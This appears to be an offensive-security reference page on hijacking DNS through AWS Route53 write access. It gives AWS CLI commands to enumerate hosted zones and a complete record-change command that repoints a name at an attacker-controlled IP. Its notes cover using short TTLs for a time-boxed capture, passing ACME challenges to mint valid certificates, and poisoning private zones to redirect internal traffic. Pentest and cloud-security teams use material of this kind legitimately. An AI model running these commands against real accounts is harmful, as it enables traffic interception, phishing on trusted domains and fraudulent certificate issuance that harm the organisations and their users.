Write access to a Route53 hosted zone is write access to where the organization's names point. With route53:ChangeResourceRecordSets you repoint a record at infrastructure you control, which captures traffic, breaks TLS validation challenges, and enables phishing on a trusted name. Reading the zones also surfaces records whose targets no longer exist, feeding dangling-DNS takeover.
Enumerating zones and records#
aws route53 list-hosted-zones
aws route53 list-resource-record-sets --hosted-zone-id <zone-id> \
--query "ResourceRecordSets[].[Name,Type,ResourceRecords[0].Value,AliasTarget.DNSName]"
Repointing a record#
aws route53 change-resource-record-sets --hosted-zone-id <zone-id> \
--change-batch '{"Changes":[{"Action":"UPSERT","ResourceRecordSet":{
"Name":"app.example.com","Type":"A","TTL":60,
"ResourceRecords":[{"Value":"<attacker-ip>"}]}}]}'
Exploitation notes#
- A short TTL makes the hijack take effect fast and makes it easy to revert, which suits a time-boxed capture.
- Repointing an ACME-validated name lets you pass an HTTP-01 or DNS-01 challenge and mint a valid certificate for it.
- Private hosted zones steer resolution inside a VPC; poisoning one redirects internal clients without touching public DNS.
Tools#
- AWS CLI (
route53 ...): zone enumeration and record changes. - ScoutSuite / Prowler: inventory hosted zones and alias targets.